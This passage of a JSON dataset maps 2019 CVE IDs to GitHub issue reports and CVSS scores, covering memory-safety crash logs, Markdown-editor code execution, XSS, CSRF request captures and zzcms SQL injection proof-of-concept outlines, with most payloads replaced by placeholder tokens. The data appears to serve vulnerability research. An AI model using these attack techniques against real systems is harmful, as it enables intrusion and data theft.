  35152. "exploitabilityScore": 3.9
  35153. },
  35154. {
  35155. "CVE_ID": "CVE-2019-12160",
  35156. "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/15",
  35157. "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/15",
  35158. "Repo_new": "fekberg/gohttp",
  35159. "Issue_Created_At": "2019-05-17T06:04:40Z",
  35160. "description": "Heap Use After Free Notification when compiling with ASAN on Ubuntu NUMBERTAG GCC NUMBERTAG Steps to reproduce: Compile APITAG Server (GCC and ASAN flags/LIBS). Screen S server cd APITAG APITAG CTRL A, D APITAG from session) Screen S Request curl FILETAG CTRL A, D Screen R server Dump NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG dc0 at pc NUMBERTAG ff1c4d NUMBERTAG b bp NUMBERTAG f fe6d5acce0 sp NUMBERTAG ffe6d5ac NUMBERTAG READ of size NUMBERTAG at NUMBERTAG dc0 thread T NUMBERTAG ff1c4d NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG d9c in APITAG ( PATHTAG NUMBERTAG bc in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ff1c3c2f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG dc0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG ff1c4d7e2ca in __interceptor_free ( PATHTAG NUMBERTAG d in APITAG ( PATHTAG NUMBERTAG f2 in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ff1c3c2f NUMBERTAG f in __libc_start_main ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG ff1c4d7e NUMBERTAG in malloc ( PATHTAG NUMBERTAG f3a in APITAG ( PATHTAG NUMBERTAG b7 in receive ( PATHTAG NUMBERTAG da in handle ( PATHTAG NUMBERTAG in APITAG ( PATHTAG NUMBERTAG db in start ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG d in main ( PATHTAG ERRORTAG NUMBERTAG d NUMBERTAG ff1c3c2f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap use after free NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG a0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG d0: fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e NUMBERTAG",
  35161. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35162. "severity": "CRITICAL",
  35163. "baseScore": 9.8,
  35164. "impactScore": 5.9,
  35165. "exploitabilityScore": 3.9
  35166. },
  35167. {
  35168. "CVE_ID": "CVE-2019-12172",
  35169. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2166",
  35170. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2166",
  35171. "Repo_new": "typora/typora-issues",
  35172. "Issue_Created_At": "2019-02-07T20:05:43Z",
  35173. "description": "Typora Version NUMBERTAG Remote Code Execution Vulnerability. Typora Version NUMBERTAG Remote Code Execution Vulnerability Description: Typora fails to sanitize input on HTML attributes. Abusing the APITAG URI scheme on HTML attributes can result in arbitrary code execution. The below proof of concepts will execute calculator when opened inside of Typora APITAG Linux, Windows). Attached are screenshots as well as the .md files that trigger the vulnerability APITAG Tested On: APITAG NUMBERTAG Ubuntu NUMBERTAG Windows NUMBERTAG Proof of Concepts: APITAG CODETAG Windows: CODETAG Linux: CODETAG FILETAG",
  35174. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35175. "severity": "HIGH",
  35176. "baseScore": 7.8,
  35177. "impactScore": 5.9,
  35178. "exploitabilityScore": 1.8
  35179. },
  35180. {
  35181. "CVE_ID": "CVE-2019-12173",
  35182. "Issue_Url_old": "https://github.com/MacDownApp/macdown/issues/1050",
  35183. "Issue_Url_new": "https://github.com/macdownapp/macdown/issues/1050",
  35184. "Repo_new": "macdownapp/macdown",
  35185. "Issue_Created_At": "2019-01-28T02:45:54Z",
  35186. "description": "Macdown Version NUMBERTAG Remote Code Execution. Macdown Version NUMBERTAG Remote Code Execution Macdown version NUMBERTAG is affected by a remote code execution vulnerability. Macdown fails to sanitize input on HTML attributes. Abusing the APITAG URI scheme on HTML attributes can result in arbitrary code execution. The attached proof of concept will execute the APITAG Calculator.app when opened inside of Macdown. APITAG APITAG ERRORTAG Screenshot: APITAG FILETAG",
  35187. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  35188. "severity": "HIGH",
  35189. "baseScore": 8.8,
  35190. "impactScore": 5.9,
  35191. "exploitabilityScore": 2.8
  35192. },
  35193. {
  35194. "CVE_ID": "CVE-2019-12198",
  35195. "Issue_Url_old": "https://github.com/fekberg/GoHttp/issues/18",
  35196. "Issue_Url_new": "https://github.com/fekberg/gohttp/issues/18",
  35197. "Repo_new": "fekberg/gohttp",
  35198. "Issue_Created_At": "2019-05-19T18:57:53Z",
  35199. "description": "stack buffer overflow NUMBERTAG characters in User Agent string causes stack overflow.. APITAG APITAG APITAG root MENTIONTAG APITAG APITAG : APITAG PATHTAG APITAG APITAG curl A APITAG localhost NUMBERTAG APITAG APITAG APITAG APITAG root MENTIONTAG APITAG APITAG : APITAG PATHTAG APITAG APITAG APITAG Settings: Port NUMBERTAG Server root: PATHTAG Configuration file: APITAG Logfile: .log Deamon NUMBERTAG APITAG APITAG APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fff NUMBERTAG bd NUMBERTAG at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG fff NUMBERTAG bae0 sp NUMBERTAG fff NUMBERTAG b NUMBERTAG APITAG APITAG APITAG APITAG READ of size NUMBERTAG at NUMBERTAG fff NUMBERTAG bd NUMBERTAG thread T0 APITAG APITAG NUMBERTAG f3f ( PATHTAG NUMBERTAG b ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG cbc ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG fc NUMBERTAG ca NUMBERTAG a ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG ) APITAG APITAG NUMBERTAG fff NUMBERTAG bd NUMBERTAG is located in stack of thread T0 at offset NUMBERTAG in frame APITAG APITAG NUMBERTAG f ( PATHTAG ) This frame has NUMBERTAG object(s NUMBERTAG apos;buffer&apos; (line NUMBERTAG APITAG APITAG &lt;== Memory access at offset NUMBERTAG overflows this variable APITAG APITAG HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions are supported) SUMMARY: APITAG stack buffer overflow ( PATHTAG ) Shadow bytes around the buggy address NUMBERTAG APITAG APITAG f1 APITAG APITAG APITAG APITAG f1 APITAG APITAG APITAG APITAG f1 APITAG APITAG APITAG APITAG f1 APITAG APITAG NUMBERTAG gt NUMBERTAG a NUMBERTAG APITAG APITAG f3 APITAG APITAG ] APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG APITAG APITAG f3 APITAG APITAG NUMBERTAG b NUMBERTAG c NUMBERTAG d NUMBERTAG e NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: APITAG APITAG fa APITAG APITAG Freed heap region: APITAG APITAG fd APITAG APITAG Stack left redzone: APITAG APITAG f1 APITAG APITAG Stack mid redzone: APITAG APITAG f2 APITAG APITAG Stack right redzone: APITAG APITAG f3 APITAG APITAG Stack after return: APITAG APITAG f5 APITAG APITAG Stack use after scope: APITAG APITAG f8 APITAG APITAG Global redzone: APITAG APITAG f9 APITAG APITAG Global init order: APITAG APITAG f6 APITAG APITAG Poisoned by user: APITAG APITAG f7 APITAG APITAG Container overflow: APITAG APITAG fc APITAG APITAG Array cookie: APITAG APITAG ac APITAG APITAG Intra object redzone: APITAG APITAG bb APITAG APITAG APITAG internal: APITAG APITAG fe APITAG APITAG Left alloca redzone: APITAG APITAG ca APITAG APITAG Right alloca redzone: APITAG APITAG cb APITAG APITAG NUMBERTAG ABORTING APITAG",
  35200. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35201. "severity": "HIGH",
  35202. "baseScore": 7.5,
  35203. "impactScore": 3.6,
  35204. "exploitabilityScore": 3.9
  35205. },
  35206. {
  35207. "CVE_ID": "CVE-2019-12206",
  35208. "Issue_Url_old": "https://github.com/nginx/njs/issues/162",
  35209. "Issue_Url_new": "https://github.com/nginx/njs/issues/162",
  35210. "Repo_new": "nginx/njs",
  35211. "Issue_Created_At": "2019-05-20T08:18:34Z",
  35212. "description": "heap buffer overflow in nxt_utf8_encode APITAG NJS version ERRORTAG APITAG testcase: ERRORTAG APITAG testcase (b NUMBERTAG CODETAG Valgrind output: ERRORTAG",
  35213. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35214. "severity": "CRITICAL",
  35215. "baseScore": 9.8,
  35216. "impactScore": 5.9,
  35217. "exploitabilityScore": 3.9
  35218. },
  35219. {
  35220. "CVE_ID": "CVE-2019-12207",
  35221. "Issue_Url_old": "https://github.com/nginx/njs/issues/168",
  35222. "Issue_Url_new": "https://github.com/nginx/njs/issues/168",
  35223. "Repo_new": "nginx/njs",
  35224. "Issue_Created_At": "2019-05-20T09:01:01Z",
  35225. "description": "heap buffer overflow in nxt_utf8_decode APITAG Testcase (in base NUMBERTAG CODETAG njs version: APITAG Stack trace (from ASAN): ERRORTAG Found by fluff URLTAG",
  35226. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35227. "severity": "CRITICAL",
  35228. "baseScore": 9.8,
  35229. "impactScore": 5.9,
  35230. "exploitabilityScore": 3.9
  35231. },
  35232. {
  35233. "CVE_ID": "CVE-2019-12208",
  35234. "Issue_Url_old": "https://github.com/nginx/njs/issues/163",
  35235. "Issue_Url_new": "https://github.com/nginx/njs/issues/163",
  35236. "Repo_new": "nginx/njs",
  35237. "Issue_Created_At": "2019-05-20T08:30:18Z",
  35238. "description": "heap buffer overflow in njs_function_native_call APITAG NJS version ERRORTAG APITAG testcase: ERRORTAG ASAN log: ERRORTAG",
  35239. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35240. "severity": "CRITICAL",
  35241. "baseScore": 9.8,
  35242. "impactScore": 5.9,
  35243. "exploitabilityScore": 3.9
  35244. },
  35245. {
  35246. "CVE_ID": "CVE-2019-12215",
  35247. "Issue_Url_old": "https://github.com/matomo-org/matomo/issues/14464",
  35248. "Issue_Url_new": "https://github.com/matomo-org/matomo/issues/14464",
  35249. "Repo_new": "matomo-org/matomo",
  35250. "Issue_Created_At": "2019-05-20T08:54:18Z",
  35251. "description": "Full Path Disclosure. A full path disclosure vulnerability was discovered in Matomo APITAG where a user can trigger a particular error to discover the full path of Matomo on the disk. PAYLOAD URLTAG APITAG RESULT: Neither the property APITAG nor one of the methods APITAG APITAG or APITAG exist and have public access in class PATHTAG in PATHTAG line NUMBERTAG",
  35252. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  35253. "severity": "MEDIUM",
  35254. "baseScore": 4.3,
  35255. "impactScore": 1.4,
  35256. "exploitabilityScore": 2.8
  35257. },
  35258. {
  35259. "CVE_ID": "CVE-2019-12250",
  35260. "Issue_Url_old": "https://github.com/IdentityServer/IdentityServer4/issues/3279",
  35261. "Issue_Url_new": "https://github.com/identityserver/identityserver4/issues/3279",
  35262. "Repo_new": "identityserver/identityserver4",
  35263. "Issue_Created_At": "2019-05-21T07:00:37Z",
  35264. "description": "XSS in the APITAG Hi, FILETAG in the APITAG method the PARAM APITAG is not filtred, and can be injected with XSS payload APITAG in which can be triggred from the log as well. static APITAG APITAG APITAG { var request = APITAG var result = Log APITAG APITAG => APITAG h => APITAG APITAG true) APITAG APITAG APITAG APITAG if APITAG result = APITAG APITAG => APITAG v => APITAG return result; }",
  35265. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35266. "severity": "MEDIUM",
  35267. "baseScore": 6.1,
  35268. "impactScore": 2.7,
  35269. "exploitabilityScore": 2.8
  35270. },
  35271. {
  35272. "CVE_ID": "CVE-2019-12253",
  35273. "Issue_Url_old": "https://github.com/ilosuna/mylittleforum/issues/468",
  35274. "Issue_Url_new": "https://github.com/my-little-forum/mylittleforum/issues/468",
  35275. "Repo_new": "my-little-forum/mylittleforum",
  35276. "Issue_Created_At": "2019-05-06T07:10:31Z",
  35277. "description": "CSRF token not present in delete posting request in admin panel | Manage posting. Application is vulnerable for CSRF as CSRF token is not sent when a delete posting request is triggered. There are two scenarios which I have observed in this request NUMBERTAG Delete request is a simple GET request : GET APITAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG DNT NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Delete request is a post request but without CSRF token. POST FILETAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG APITAG NUMBERTAG delete_posting_confirm=OK+ APITAG In both the cases application is vulnerable to CSRF, where attacker can trigger delete request when a victim clicks on a vulnerable link.",
  35278. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  35279. "severity": "MEDIUM",
  35280. "baseScore": 6.5,
  35281. "impactScore": 3.6,
  35282. "exploitabilityScore": 2.8
  35283. },
  35284. {
  35285. "CVE_ID": "CVE-2019-12291",
  35286. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5888",
  35287. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5888",
  35288. "Repo_new": "hashicorp/consul",
  35289. "Issue_Created_At": "2019-05-22T19:21:46Z",
  35290. "description": "Reserve Issue Number.",
  35291. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  35292. "severity": "HIGH",
  35293. "baseScore": 7.5,
  35294. "impactScore": 3.6,
  35295. "exploitabilityScore": 3.9
  35296. },
  35297. {
  35298. "CVE_ID": "CVE-2019-12298",
  35299. "Issue_Url_old": "https://github.com/JayXon/Leanify/issues/50",
  35300. "Issue_Url_new": "https://github.com/jayxon/leanify/issues/50",
  35301. "Repo_new": "jayxon/leanify",
  35302. "Issue_Created_At": "2019-05-20T17:43:12Z",
  35303. "description": "Fuzzing: Specially crafted input file results in repeatable crash when compiled with ASAN under Ubuntu/GCC.. I found Leanify while doing some research and decided to use Radamsa to test the robustness of the application. It appears pretty solid. I grabbed a ton of test files and then ran this simple loop to generate some more files; for i in $(ls); do cat $i | radamsa; done. I did note a few things that were interesting, the most of which was a crash noted by ASAN from mutated files that proved hard to debug. I've done the test case reduction already down from several hundred bytes to the smallest byte string I could find that still induced the crash. I did note that by modifying the length of the input file, the resulting address of the crash could be changed. Note that in the reproduction steps below, amongst the output shows the READ attempt at crash time. Another interesting crash I noted was a WRITE of NUMBERTAG bytes in another crash file. READ: root APITAG cat unknown_crash ?.W\\T NUMBERTAG APITAG ./leanify /root/test Processing: /root/test APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ffff7fec NUMBERTAG d at pc NUMBERTAG ffff6eda NUMBERTAG b bp NUMBERTAG fffffffdf NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffff7fec NUMBERTAG d thread T NUMBERTAG ffff6eda NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d5d ( PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG ) APITAG can not describe address in more detail (wild memory access suspected). SUMMARY: APITAG unknown crash NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG a0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG b0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG c0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG d0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG e0: fe fe fe fe fe fe fe[fe]fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG f0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING Another READ: APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ffff7fecc4a at pc NUMBERTAG ffff6eda NUMBERTAG b bp NUMBERTAG fffffffdf NUMBERTAG sp NUMBERTAG fffffffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ffff7fecc4a thread T NUMBERTAG ffff6eda NUMBERTAG a in __interceptor_strlen ( PATHTAG NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d5d ( PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG ) APITAG can not describe address in more detail (wild memory access suspected). SUMMARY: APITAG unknown crash NUMBERTAG interceptor_strlen Shadow bytes around the buggy address NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe[fe]fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG a0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG b0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG c0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG d0: fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING A WRITE crash: Checksum does not match! APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ffff7fea NUMBERTAG at pc NUMBERTAG ffff6ef6bec bp NUMBERTAG fffffffe NUMBERTAG sp NUMBERTAG fffffffd8d8 WRITE of size NUMBERTAG at NUMBERTAG ffff7fea NUMBERTAG thread T NUMBERTAG ffff6ef6beb in __asan_memset ( PATHTAG NUMBERTAG b3e ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG d5d ( PATHTAG NUMBERTAG ffff NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG ) APITAG can not describe address in more detail (wild memory access suspected). SUMMARY: APITAG unknown crash NUMBERTAG asan_memset Shadow bytes around the buggy address NUMBERTAG eff NUMBERTAG b NUMBERTAG eff NUMBERTAG c NUMBERTAG eff NUMBERTAG d NUMBERTAG eff NUMBERTAG e NUMBERTAG eff NUMBERTAG f NUMBERTAG eff NUMBERTAG fe]fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe NUMBERTAG eff NUMBERTAG fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING I thought about starting to add some debug statements to narrow down causes and see if the crash is exploitable, however I figured I would post something here about the crashes under ASAN. The program appears to exit far more gracefully without ASAN added.",
  35304. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35305. "severity": "MEDIUM",
  35306. "baseScore": 5.5,
  35307. "impactScore": 3.6,
  35308. "exploitabilityScore": 1.8
  35309. },
  35310. {
  35311. "CVE_ID": "CVE-2019-12312",
  35312. "Issue_Url_old": "https://github.com/libreswan/libreswan/issues/246",
  35313. "Issue_Url_new": "https://github.com/libreswan/libreswan/issues/246",
  35314. "Repo_new": "libreswan/libreswan",
  35315. "Issue_Created_At": "2019-05-12T13:12:55Z",
  35316. "description": "NULL pointer dereference and pluto daemon restart in Libreswan NUMBERTAG Hello, I triggered a vulnerability while testing the Libreswan NUMBERTAG IKE NUMBERTAG server. The pluto IKE daemon will restart (due to NULL pointer dereference when built with NSS) by sending two IKE NUMBERTAG packets which are init_IKE and delete_IKE in NUMBERTAG des_cbc mode to Libreswan server. A detailed interactive process is as follows: First, send the first init_IKE message to the server. The server replies the init_IKE message to the client. Then send a delete_IKE message (encrypted) to the server. The server tries to respond INVALID_IKE_SPI to the client, but an exception occurred while preparing to encrypt the message. detailed packets CODETAG Relevant log ERRORTAG My APITAG ERRORTAG Looking forward to your reply, thank you.",
  35317. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  35318. "severity": "HIGH",
  35319. "baseScore": 7.5,
  35320. "impactScore": 3.6,
  35321. "exploitabilityScore": 3.9
  35322. },
  35323. {
  35324. "CVE_ID": "CVE-2019-12348",
  35325. "Issue_Url_old": "https://github.com/cby234/zzcms/issues/1",
  35326. "Issue_Url_new": "https://github.com/cby234/zzcms/issues/1",
  35327. "Repo_new": "cby234/zzcms",
  35328. "Issue_Created_At": "2019-05-20T08:05:21Z",
  35329. "description": "zzcms NUMBERTAG SQL injection Vulnerability. Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG When we start 'modify' logic we can see 'daohang' var receive $_POST FILETAG We can find ' value in update query it means ' value after 'daohang' parameter does not mean any more. FILETAG FILETAG After 'daohang' paramter 'bannerbg' will appear and if we check about 'bannerbg' parameter we can't find any other security filter. So we can inject any query via 'bannerbg' parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : update SQL injection APITAG a FILETAG FILETAG POC2 : Time based Blind SQL injection APITAG a FILETAG",
  35330. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35331. "severity": "CRITICAL",
  35332. "baseScore": 9.8,
  35333. "impactScore": 5.9,
  35334. "exploitabilityScore": 3.9
  35335. },
  35336. {
  35337. "CVE_ID": "CVE-2019-12349",
  35338. "Issue_Url_old": "https://github.com/cby234/zzcms/issues/2",
  35339. "Issue_Url_new": "https://github.com/cby234/zzcms/issues/2",
  35340. "Repo_new": "cby234/zzcms",
  35341. "Issue_Created_At": "2019-05-20T08:47:25Z",
  35342. "description": "zzcms NUMBERTAG FILETAG SQL injection. Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG Let's look at SQL query part FILETAG If index of , value is not NUMBERTAG sql will be (/ if(strpos($id NUMBERTAG line NUMBERTAG select from zzcms_dl where saver APITAG '' and id in (\". $id .\")\" There is no single quote for id parameter. So We can inject any sql in id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : Union SQL injection APITAG union select APITAG a, FILETAG",
  35343. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35344. "severity": "CRITICAL",
  35345. "baseScore": 9.8,
  35346. "impactScore": 5.9,
  35347. "exploitabilityScore": 3.9
  35348. },
  35349. {
  35350. "CVE_ID": "CVE-2019-12350",
  35351. "Issue_Url_old": "https://github.com/cby234/zzcms/issues/4",
  35352. "Issue_Url_new": "https://github.com/cby234/zzcms/issues/4",
  35353. "Repo_new": "cby234/zzcms",
  35354. "Issue_Created_At": "2019-05-22T07:15:10Z",
  35355. "description": "APITAG Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG APITAG union select APITAG a, FILETAG FILETAG",
  35356. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35357. "severity": "CRITICAL",
  35358. "baseScore": 9.8,
  35359. "impactScore": 5.9,
  35360. "exploitabilityScore": 3.9
  35361. },
  35362. {
  35363. "CVE_ID": "CVE-2019-12351",
  35364. "Issue_Url_old": "https://github.com/cby234/zzcms/issues/3",
  35365. "Issue_Url_new": "https://github.com/cby234/zzcms/issues/3",
  35366. "Repo_new": "cby234/zzcms",
  35367. "Issue_Created_At": "2019-05-22T06:57:39Z",
  35368. "description": "zzcms NUMBERTAG SQL injection in FILETAG . Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG APITAG union select APITAG a, FILETAG FILETAG",
